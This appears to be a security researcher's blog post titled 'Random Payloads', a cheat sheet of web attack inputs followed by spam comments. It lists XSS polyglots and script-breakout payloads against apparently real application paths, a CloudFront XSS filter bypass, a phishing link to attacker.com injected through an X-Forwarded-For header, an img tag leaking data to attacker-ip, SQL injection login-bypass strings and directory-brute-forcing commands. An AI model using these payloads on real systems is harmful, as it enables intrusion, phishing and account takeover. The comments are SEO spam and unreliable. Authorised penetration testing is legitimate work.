Random Payloads

Confirmed using console: jQuery.fn.jquery




<target>synth=jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(1) )//

<target>/login?r=/evocms/module/modulejaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(1) )//



<object data=javascript:confirm(document.domain)>





<--`<img%2fsrc%3d` onerror%3dalert(document.domain)> --!>

X-Forwarded-For: <a href="attacker.com"><h1><font color="red">Please click here to login to your account<h1></font></a>



<p><a href="http://bing.com">click here</a></p>

<img src=\"http://attacker-ip/?id=


s=1&jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(1) )//

/?jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(1) )//

.com/search/1/feed/rss2jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(1) )//

.com/search/1/feed/rss2/jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(1) )//

?jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert(1) )//

$dirsearch.py -u https://domain.com/ -w wordlist.txt -t 10 -E --plain-text-report=output.txt

$dirsearch.py -L urls.txt -w wordlist.txt -t 10 -E --plain-text-report=output.txt


<a xmlns="http://www.w3.org/1999/xhtml" href="javascript:alert(document.domain);//">CLICK</a>

listview=fbd-team-matters-closedl</script><img src=x onerror=alert(3)>

?filfdfter=internal</script><img src=x onerror=alert(3)>

/?ifdd=20ee74b2-5daf-40fe-81d4-f904cc0ca068</script><img src=x onerror=alert(3)>

/finandffdce-payment-requests-processed?id=xsss</script><img src=x onerror=alert(3)>

?profdfdfile=xsss</script><img src=x onerror=alert(3)>

/calesfsndar??cal=xsss</script><img src=x onerror=alert(3)>

/adfdmin?id=xsss</script><img src=x onerror=alert(3)>

/teams-members?user=xsss</script><img src=x onerror=alert(3)>

/?dfdash=xsss</script><img src=x onerror=alert(3)>

XSS Payload:$1500
<</p>iframe src=javascript:alert()//
Request.queryString error in .NET avoids you to get XSS-

ohmybackup.exe --hostname http://google.com

Give this a try while testing for SQLi Authentication Bypass :
username: '--' / "--"
password: '--' / "--"

CloudFront XSS bypass:
<--`<img%2fsrc%3d` onerror%3dalert(document.domain)> --!>

Test SQLi + XSS + SSTI with the same payload use



  1. I consistently wouldn't be so associated by any articles identifying with this subject, yet yours got my attention.
    SAP training in Kolkata
    Best SAP training in Kolkata
    SAP training institute in Kolkata

  2. It is perfect chance to make a couple of game plans for the future and the opportunity has arrived to be sprightly. I've scrutinized this post and if I may I have the option to need to suggest you some interesting things or recommendations. Perhaps you could create next articles insinuating this article. I have to examine more things about it!
    data science course

  3. Through this post, I realize that your great information in playing with all the pieces was exceptionally useful. I advise this is the primary spot where I discover issues I've been scanning for. You have a smart yet alluring method of composing.
    data science course in delhi

  4. Thank you for sharing wonderful content
    what is hrdf

  5. it's really cool blog. Linking is very useful thing.you have really helped
    iot training in noida

  6. wonderful bLog! its intriguing. thankful to you for sharing.

  7. First You got a great blog .I will be interested in more similar topics. i see you got really very useful topics, i will be always checking your blog thanks.
    typeerror nonetype object is not subscriptable

  8. Really Nice Information It's Very Helpful All courses Checkout Here.
    digital marketing course in aurangabad


Post a Comment

Popular posts from this blog

Polaris’ Intellect Core Banking Software Version 9.7.1- Open Redirect [CVE-2018-14931]

Stored XSS Vulnerability in Hot Scripts Clone:Script Classified Version 3.1-[CVE-2018-7650]

Error Based SQL Injection Vulnerability in Polaris’ Intellect Core Banking Software Version 9.7.1 [CVE-2018-14874]